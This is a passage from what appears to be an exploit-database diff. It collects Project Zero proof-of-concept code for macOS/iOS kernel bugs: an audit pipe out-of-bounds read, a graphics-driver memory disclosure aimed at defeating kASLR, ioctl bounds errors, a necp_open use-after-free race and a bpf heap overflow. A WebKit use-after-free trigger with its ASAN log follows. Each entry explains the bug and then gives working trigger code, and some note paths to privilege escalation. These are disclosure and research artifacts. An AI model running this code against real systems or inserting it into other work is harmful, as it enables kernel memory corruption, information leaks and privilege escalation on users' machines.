is correct therefore it isn't validated for example in the ioctl handler:
static int
audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data,
__unused int flag, __unused proc_t p)
{
...
ap = audit_pipe_dtab[minor(dev)];
KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL"));
...
switch (cmd) {
case FIONBIO:
AUDIT_PIPE_LOCK(ap);
if (*(int *)data)
Directly after the audit_pipe_dtab array in the bss is this global variable:
static u_int64_t audit_pipe_drops;
audit_pipe_drops will be incremented each time an audit message enqueue fails:
if (ap->ap_qlen >= ap->ap_qlimit) {
ap->ap_drops++;
audit_pipe_drops++;
return;
}
So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the
struct audit_pipe* which is read out-of-bounds.
For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file
and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record
and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe*
then the ioctl will try to use that pointer.
This is a root to kernel privesc.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <bsm/audit.h>
#include <security/audit/audit_ioctl.h>
int main(int argc, char** argv) {
system("rm -rf /dev/auditpipe");
system("mknod /dev/auditpipe c 10 32");
int fd = open("/dev/auditpipe", O_RDWR);
if (fd == -1) {
perror("failed to open auditpipe device\n");
exit(EXIT_FAILURE);
}
printf("opened device\n");
system("touch a_log_file");
int auditerr = auditctl("a_log_file");
if (auditerr == -1) {
perror("failed to set a new log file\n");
}
uint32_t qlim = 1;
int err = ioctl(fd, AUDITPIPE_SET_QLIMIT, &qlim);
if (err == -1) {
perror("AUDITPIPE_SET_QLIMIT");
exit(EXIT_FAILURE);
}
while(1) {
char* audit_data = "\x74hello";
int audit_len = strlen(audit_data)+1;
audit(audit_data, audit_len);
uint32_t nread = 0;
int err = ioctl(fd, FIONREAD, &qlim);
if (err == -1) {
perror("FIONREAD");
exit(EXIT_FAILURE);
}
}
return 0;
}

138
platforms/macos/dos/41798.c Executable file
View file

@ -0,0 +1,138 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1069
MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability
Selector 0x710 of IntelFBClientControl ends up in AppleIntelCapriController::getDisplayPipeCapability.
This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it
uses to index an array of pointers with no bounds checking:
AppleIntelCapriController::getDisplayPipeCapability(AGDCFBGetDisplayCapability_t *, AGDCFBGetDisplayCapability_t *)
__text:000000000002A3AB mov r14, rdx ; output buffer, readable from userspace
__text:000000000002A3AE mov rbx, rsi ; input buffer, controlled from userspace
...
__text:000000000002A3B8 mov eax, [rbx] ; read dword
__text:000000000002A3BA mov rsi, [rdi+rax*8+0E40h] ; use as index for small inline buffer in this object
__text:000000000002A3C2 cmp byte ptr [rsi+1DCh], 0 ; fail if byte at +0x1dc is 0
__text:000000000002A3C9 jz short ___fail
__text:000000000002A3CB add rsi, 1E0Dh ; otherwise, memcpy from that pointer +0x1e0dh
__text:000000000002A3D2 mov edx, 1D8h ; 0x1d8 bytes
__text:000000000002A3D7 mov rdi, r14 ; to the buffer which will be sent back to userspace
__text:000000000002A3DA call _memcpy
For this PoC we try to read the pointers at 0x2000 byte boundaries after this allocation; with luck there will be a vtable
pointer there which will allow us to read back vtable contents and defeat kASLR.
With a bit more effort this could be turned into an (almost) arbitrary read by for example spraying the kernel heap with the desired read target
then using a larger offset hoping to land in one of the sprayed buffers. A kernel arbitrary read would, for example, allow you to read the sandbox.kext
HMAC key and forge sandbox extensions if it still works like that.
tested on MacOS Sierra 10.12.2 (16C67)
*/
// ianbeer
// build: clang -o capri_mem capri_mem.c -framework IOKit
#if 0
MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability
Selector 0x710 of IntelFBClientControl ends up in AppleIntelCapriController::getDisplayPipeCapability.
This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it
uses to index an array of pointers with no bounds checking:
AppleIntelCapriController::getDisplayPipeCapability(AGDCFBGetDisplayCapability_t *, AGDCFBGetDisplayCapability_t *)
__text:000000000002A3AB mov r14, rdx ; output buffer, readable from userspace
__text:000000000002A3AE mov rbx, rsi ; input buffer, controlled from userspace
...
__text:000000000002A3B8 mov eax, [rbx] ; read dword
__text:000000000002A3BA mov rsi, [rdi+rax*8+0E40h] ; use as index for small inline buffer in this object
__text:000000000002A3C2 cmp byte ptr [rsi+1DCh], 0 ; fail if byte at +0x1dc is 0
__text:000000000002A3C9 jz short ___fail
__text:000000000002A3CB add rsi, 1E0Dh ; otherwise, memcpy from that pointer +0x1e0dh
__text:000000000002A3D2 mov edx, 1D8h ; 0x1d8 bytes
__text:000000000002A3D7 mov rdi, r14 ; to the buffer which will be sent back to userspace
__text:000000000002A3DA call _memcpy
For this PoC we try to read the pointers at 0x2000 byte boundaries after this allocation; with luck there will be a vtable
pointer there which will allow us to read back vtable contents and defeat kASLR.
With a bit more effort this could be turned into an (almost) arbitrary read by for example spraying the kernel heap with the desired read target
then using a larger offset hoping to land in one of the sprayed buffers. A kernel arbitrary read would, for example, allow you to read the sandbox.kext
HMAC key and forge sandbox extensions if it still works like that.
tested on MacOS Sierra 10.12.2 (16C67)
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach_error.h>
#include <IOKit/IOKitLib.h>
int main(int argc, char** argv){
kern_return_t err;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 4096;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0x1d8;
for (int step = 1; step < 1000; step++) {
memset(inputStruct, 0, inputStructCnt);
*(uint32_t*)inputStruct = 0x238 + (step*(0x2000/8));
outputStructCnt = 4096;
memset(outputStruct, 0, outputStructCnt);
err = IOConnectCallMethod(
conn,
0x710,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err == KERN_SUCCESS) {
break;
}
printf("retrying 0x2000 up - %s\n", mach_error_string(err));
}
uint64_t* leaked = (uint64_t*)(outputStruct+3);
for (int i = 0; i < 0x1d8/8; i++) {
printf("%016llx\n", leaked[i]);
}
return 0;
}

113
platforms/multiple/dos/41792.c Executable file
View file

@ -0,0 +1,113 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1108
SIOCSIFORDER is a new ioctl added in iOS 10. It can be called on a regular tcp socket, so from pretty much any sandbox.
it falls through to calling:
ifnet_reset_order(ordered_indices, ifo->ifo_count)
where ordered_indicies points to attacker-controlled bytes.
ifnet_reset_order contains this code:
for (u_int32_t order_index = 0; order_index < count; order_index++) {
u_int32_t interface_index = ordered_indices[order_index]; <---------------- (a)
if (interface_index == IFSCOPE_NONE ||
(int)interface_index > if_index) { <-------------------------- (b)
break;
}
ifp = ifindex2ifnet[interface_index]; <-------------------------- (c)
if (ifp == NULL) {
continue;
}
ifnet_lock_exclusive(ifp);
TAILQ_INSERT_TAIL(&ifnet_ordered_head, ifp, if_ordered_link); <---------- (d)
ifnet_lock_done(ifp);
if_ordered_count++;
}
at (a) a controlled 32-bit value is read into an unsigned 32-bit variable.
at (b) this value is cast to a signed type for a bounds check
at (c) this value is used as an unsigned index
by providing a value with the most-significant bit set making it negative when cast to a signed type
we can pass the bounds check at (b) and lead to reading an interface pointer out-of-bounds
below the ifindex2ifnet array.
This leads very directly to memory corruption at (d) which will add the value read out of bounds to a list structure.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
(on 64-bit platforms the array index wouldn't wrap around so the read would actually occur > 2GB above the array, not below)
*/
// ianbeer
#if 0
MacOS/iOS kernel memory corruption due to Bad bounds checking in SIOCSIFORDER socket ioctl
SIOCSIFORDER is a new ioctl added in iOS 10. It can be called on a regular tcp socket, so from pretty much any sandbox.
it falls through to calling:
ifnet_reset_order(ordered_indices, ifo->ifo_count)
where ordered_indicies points to attacker-controlled bytes.
ifnet_reset_order contains this code:
for (u_int32_t order_index = 0; order_index < count; order_index++) {
u_int32_t interface_index = ordered_indices[order_index]; <---------------- (a)
if (interface_index == IFSCOPE_NONE ||
(int)interface_index > if_index) { <-------------------------- (b)
break;
}
ifp = ifindex2ifnet[interface_index]; <-------------------------- (c)
if (ifp == NULL) {
continue;
}
ifnet_lock_exclusive(ifp);
TAILQ_INSERT_TAIL(&ifnet_ordered_head, ifp, if_ordered_link); <---------- (d)
ifnet_lock_done(ifp);
if_ordered_count++;
}
at (a) a controlled 32-bit value is read into an unsigned 32-bit variable.
at (b) this value is cast to a signed type for a bounds check
at (c) this value is used as an unsigned index
by providing a value with the most-significant bit set making it negative when cast to a signed type
we can pass the bounds check at (b) and lead to reading an interface pointer out-of-bounds
below the ifindex2ifnet array.
This leads very directly to memory corruption at (d) which will add the value read out of bounds to a list structure.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <mach/mach.h>
struct if_order {
u_int32_t ifo_count;
u_int32_t ifo_reserved;
mach_vm_address_t ifo_ordered_indices; /* array of u_int32_t */
};
#define SIOCSIFORDER _IOWR('i', 178, struct if_order)
int main() {
uint32_t data[] = {0x80001234};
struct if_order ifo;
ifo.ifo_count = 1;
ifo.ifo_reserved = 0;
ifo.ifo_ordered_indices = (mach_vm_address_t)data;
int fd = socket(PF_INET, SOCK_STREAM, 0);
int ret = ioctl(fd, SIOCSIFORDER, &ifo);
return 0;
}

185
platforms/multiple/dos/41793.c Executable file
View file

@ -0,0 +1,185 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1111
SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the
ifnet_ordered_head linked list of interfaces.
SIOCSIFORDER clears the existing list and allows userspace to specify an array of
interface indexes used to build a new list.
SIOCGIFORDER allow userspace to query the list of interface identifiers used to build
that list.
Here's the relevant code for SIOCGIFORDER:
case SIOCGIFORDER: { /* struct if_order */
struct if_order *ifo = (struct if_order *)(void *)data;
u_int32_t ordered_count = if_ordered_count; <----------------- (a)
if (ifo->ifo_count == 0 ||
ordered_count == 0) {
ifo->ifo_count = ordered_count;
} else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) {
u_int32_t count_to_copy =
MIN(ordered_count, ifo->ifo_count); <---------------- (b)
size_t length = (count_to_copy * sizeof(u_int32_t));
struct ifnet *ifp = NULL;
u_int32_t cursor = 0;
ordered_indices = _MALLOC(length, M_NECP, M_WAITOK);
if (ordered_indices == NULL) {
error = ENOMEM;
break;
}
ifnet_head_lock_shared();
TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) {
if (cursor > count_to_copy) { <------------------ (c)
break;
}
ordered_indices[cursor] = ifp->if_index; <------------------ (d)
cursor++;
}
ifnet_head_done();
at (a) it reads the actual length of the list (of course it should take the lock here too,
but that's not the bug I'm reporting)
at (b) it computes the number of entries it wants to copy as the minimum of the requested number
and the actual number of entries in the list
the loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that
the write at (d) won't go out of bounds, but it should be a >=, not a >, as cursor is the number of
elements *already* written. If count_to_copy is 0, and cursor is 0 the write will still happen!
By requesting one fewer entries than are actually in the list the code will always write one interface index
entry one off the end of the ordered_indices array.
This poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries
then writes 5 entries into there.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
*/
// ianbeer
// add gzalloc_size=16 to boot args to see the actual OOB write more easily
#if 0
MacOS/iOS kernel memory corruption due to off-by-one in SIOCGIFORDER socket ioctl
SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the
ifnet_ordered_head linked list of interfaces.
SIOCSIFORDER clears the existing list and allows userspace to specify an array of
interface indexes used to build a new list.
SIOCGIFORDER allow userspace to query the list of interface identifiers used to build
that list.
Here's the relevant code for SIOCGIFORDER:
case SIOCGIFORDER: { /* struct if_order */
struct if_order *ifo = (struct if_order *)(void *)data;
u_int32_t ordered_count = if_ordered_count; <----------------- (a)
if (ifo->ifo_count == 0 ||
ordered_count == 0) {
ifo->ifo_count = ordered_count;
} else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) {
u_int32_t count_to_copy =
MIN(ordered_count, ifo->ifo_count); <---------------- (b)
size_t length = (count_to_copy * sizeof(u_int32_t));
struct ifnet *ifp = NULL;
u_int32_t cursor = 0;
ordered_indices = _MALLOC(length, M_NECP, M_WAITOK);
if (ordered_indices == NULL) {
error = ENOMEM;
break;
}
ifnet_head_lock_shared();
TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) {
if (cursor > count_to_copy) { <------------------ (c)
break;
}
ordered_indices[cursor] = ifp->if_index; <------------------ (d)
cursor++;
}
ifnet_head_done();
at (a) it reads the actual length of the list (of course it should take the lock here too,
but that's not the bug I'm reporting)
at (b) it computes the number of entries it wants to copy as the minimum of the requested number
and the actual number of entries in the list
the loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that
the write at (d) won't go out of bounds, but it should be a >=, not a >, as cursor is the number of
elements *already* written. If count_to_copy is 0, and cursor is 0 the write will still happen!
By requesting one fewer entries than are actually in the list the code will always write one interface index
entry one off the end of the ordered_indices array.
This poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries
then writes 5 entries into there.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <mach/mach.h>
struct if_order {
u_int32_t ifo_count;
u_int32_t ifo_reserved;
mach_vm_address_t ifo_ordered_indices; /* array of u_int32_t */
};
#define SIOCSIFORDER _IOWR('i', 178, struct if_order)
#define SIOCGIFORDER _IOWR('i', 179, struct if_order)
void set(int fd, uint32_t n) {
uint32_t* data = malloc(n*4);
for (int i = 0; i < n; i++) {
data[i] = 1;
}
struct if_order ifo;
ifo.ifo_count = n;
ifo.ifo_reserved = 0;
ifo.ifo_ordered_indices = (mach_vm_address_t)data;
ioctl(fd, SIOCSIFORDER, &ifo);
free(data);
}
void get(int fd, uint32_t n) {
uint32_t* data = malloc(n*4);
memset(data, 0, n*4);
struct if_order ifo;
ifo.ifo_count = n;
ifo.ifo_reserved = 0;
ifo.ifo_ordered_indices = (mach_vm_address_t)data;
ioctl(fd, SIOCGIFORDER, &ifo);
free(data);
}
int main() {
int fd = socket(PF_INET, SOCK_STREAM, 0);
set(fd, 5);
get(fd, 4);
return 0;
}

146
platforms/multiple/dos/41794.c Executable file
View file

@ -0,0 +1,146 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116
necp_open is a syscall used to obtain a new necp file descriptor
The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.
Here's the relevant code from necp_open:
error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)
if (error != 0) {
goto done;
}
if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,
M_WAITOK | M_ZERO)) == NULL) {
error = ENOMEM;
goto done;
}
fd_data->flags = uap->flags;
LIST_INIT(&fd_data->clients);
lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);
klist_init(&fd_data->si.si_note);
fd_data->proc_pid = proc_pid(p);
fp->f_fglob->fg_flag = FREAD;
fp->f_fglob->fg_ops = &necp_fd_ops;
fp->f_fglob->fg_data = fd_data; <-------------------------- (b)
proc_fdlock(p);
*fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);
procfdtbl_releasefd(p, fd, NULL);
fp_drop(p, fd, fp, 1);
proc_fdunlock(p); <--------------------- (c)
*retval = fd;
lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)
LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)
lck_rw_done(&necp_fd_lock);
at (a) a new file descriptor and file object is allocated for the calling process
at (b) that new file's fg_data is set to the fd_data heap allocation
at (c) the process fd table is unlocked meaning that other processes can now look up
the new fd and get the associated fp
at (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list
The bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)
another thread can call close on the new fd which will free fd_data before we enqueue it at (e).
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
in: "...that other processes can now look up the new fd and get the associated fp..." I meant threads, not processes!
*/
// ianbeer
#if 0
MacOS/iOS kernel uaf due to bad locking in necp_open
necp_open is a syscall used to obtain a new necp file descriptor
The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.
Here's the relevant code from necp_open:
error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)
if (error != 0) {
goto done;
}
if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,
M_WAITOK | M_ZERO)) == NULL) {
error = ENOMEM;
goto done;
}
fd_data->flags = uap->flags;
LIST_INIT(&fd_data->clients);
lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);
klist_init(&fd_data->si.si_note);
fd_data->proc_pid = proc_pid(p);
fp->f_fglob->fg_flag = FREAD;
fp->f_fglob->fg_ops = &necp_fd_ops;
fp->f_fglob->fg_data = fd_data; <-------------------------- (b)
proc_fdlock(p);
*fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);
procfdtbl_releasefd(p, fd, NULL);
fp_drop(p, fd, fp, 1);
proc_fdunlock(p); <--------------------- (c)
*retval = fd;
lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)
LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)
lck_rw_done(&necp_fd_lock);
at (a) a new file descriptor and file object is allocated for the calling process
at (b) that new file's fg_data is set to the fd_data heap allocation
at (c) the process fd table is unlocked meaning that other processes can now look up
the new fd and get the associated fp
at (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list
The bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)
another thread can call close on the new fd which will free fd_data before we enqueue it at (e).
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/syscall.h>
int necp_open(int flags) {
return syscall(SYS_necp_open, flags);
}
void* closer(void* arg) {
while(1) {
close(3);
}
}
int main() {
for (int i = 0; i < 10; i++) {
pthread_t t;
pthread_create(&t, NULL, closer, NULL);
}
while (1) {
int fd = necp_open(0);
close(fd);
}
return 0;
}

166
platforms/multiple/dos/41796.c Executable file
View file

@ -0,0 +1,166 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1125
The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:
case BIOCSBLEN: /* u_int */
if (d->bd_bif != 0)
error = EINVAL;
else {
u_int size;
bcopy(addr, &size, sizeof (size));
if (size > bpf_maxbufsize)
size = bpf_maxbufsize;
else if (size < BPF_MINBUFSIZE)
size = BPF_MINBUFSIZE;
bcopy(&size, addr, sizeof (size));
d->bd_bufsize = size;
}
break;
d->bd_bif is set to the currently attached interface, so we can't change the length if we're already
attached to an interface.
There's no ioctl command to detach us from an interface, but we can just destroy the interface
(by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger
length which will set d->bd_bufsize to a new, larger value.
If we then attach to an interface again we hit this code in bpf_setif:
if (d->bd_sbuf == 0) {
error = bpf_allocbufs(d);
if (error != 0)
return (error);
This means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the
old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size
leading to heap corruption when packets are receive on the target interface.
This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys
the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our
bpf device.)
We then set a large buffer size and attach to the loopback interface and sent some large ping packets.
This bug is a root -> kernel priv esc
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
*/
//ianbeer
#if 0
MacOS/iOS kernel heap overflow in bpf
The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:
case BIOCSBLEN: /* u_int */
if (d->bd_bif != 0)
error = EINVAL;
else {
u_int size;
bcopy(addr, &size, sizeof (size));
if (size > bpf_maxbufsize)
size = bpf_maxbufsize;
else if (size < BPF_MINBUFSIZE)
size = BPF_MINBUFSIZE;
bcopy(&size, addr, sizeof (size));
d->bd_bufsize = size;
}
break;
d->bd_bif is set to the currently attached interface, so we can't change the length if we're already
attached to an interface.
There's no ioctl command to detach us from an interface, but we can just destroy the interface
(by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger
length which will set d->bd_bufsize to a new, larger value.
If we then attach to an interface again we hit this code in bpf_setif:
if (d->bd_sbuf == 0) {
error = bpf_allocbufs(d);
if (error != 0)
return (error);
This means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the
old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size
leading to heap corruption when packets are receive on the target interface.
This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys
the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our
bpf device.)
We then set a large buffer size and attach to the loopback interface and sent some large ping packets.
This bug is a root -> kernel priv esc
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
int main(int argc, char** argv) {
int fd = open("/dev/bpf3", O_RDWR);
if (fd == -1) {
perror("failed to open bpf device\n");
exit(EXIT_FAILURE);
}
// first set a small length:
int len = 64;
int err = ioctl(fd, BIOCSBLEN, &len);
if (err == -1) {
perror("setting small buffer length");
exit(EXIT_FAILURE);
}
// create an interface which we can destroy later:
system("ifconfig bridge7 create");
// connect the bpf device to that interface, allocating the buffer
struct ifreq ifr;
strcpy(ifr.ifr_name, "bridge7");
err = ioctl(fd, BIOCSETIF, &ifr);
if (err == -1) {
perror("attaching to interface");
exit(EXIT_FAILURE);
}
// remove that interface, detaching us:
system("ifconfig bridge7 destroy");
// set a large buffer size:
len = 4096;
err = ioctl(fd, BIOCSBLEN, &len);
if (err == -1) {
perror("setting large buffer length");
exit(EXIT_FAILURE);
}
// connect to a legit interface with traffic:
strcpy(ifr.ifr_name, "lo0");
err = ioctl(fd, BIOCSETIF, &ifr);
if (err == -1) {
perror("attaching to interface");
exit(EXIT_FAILURE);
}
// wait for a packet...
system("ping localhost -s 1400");
return 0;
}

222
platforms/multiple/dos/41807.html Executable file
View file

@ -0,0 +1,222 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1080
There is a use-after-free security vulnerability related to how the HTMLInputElement is handled in WebKit. The vulnerability was confirmed on a nightly build of WebKit. The PoC also crashes Safari 10.0.2 on Mac.
PoC:
=================================================================
-->
<script>
function eventhandler1() {
input.type = "foo";
}
function eventhandler2() {
input.selectionStart = 25;
}
</script>
<input id="input" onfocus="eventhandler1()" autofocus="autofocus" type="tel">
<iframe onload="eventhandler2()"></iframe>
<!--
=================================================================
ASAN log (from WebKit nightly on Mac):
=================================================================
==26782==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800005a3b4 at pc 0x000108e904ad bp 0x7fff5e5fa940 sp 0x7fff5e5fa938
READ of size 4 at 0x60800005a3b4 thread T0
#0 0x108e904ac in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x84ac)
#1 0x108e93568 in WebCore::Node::renderer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xb568)
#2 0x10ad2213a in WebCore::Node::renderBox() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e9a13a)
#3 0x109b9e2eb in WebCore::HTMLTextFormControlElement::setSelectionRange(int, int, WebCore::TextFieldSelectionDirection, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd162eb)
#4 0x109b9db6a in WebCore::HTMLTextFormControlElement::setSelectionStart(int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd15b6a)
#5 0x109afa97f in WebCore::HTMLInputElement::setSelectionStartForBindings(int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc7297f)
#6 0x10a37a857 in WebCore::setJSHTMLInputElementSelectionStartFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14f2857)
#7 0x10a3718af in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementSelectionStartFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14e98af)
#8 0x105a0ab58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)
#9 0x105a0ac85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)
#10 0x1063edf95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)
#11 0x1065a2223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)
#12 0x1065bdbfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)
#13 0x1065c126c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#14 0x1065ba83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
#15 0x10627947d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
#16 0x106203aa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)
#17 0x1058f5991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)
#18 0x1058f5abb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)
#19 0x1058f5e06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)
#20 0x109f3ab2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)
#21 0x10a220786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)
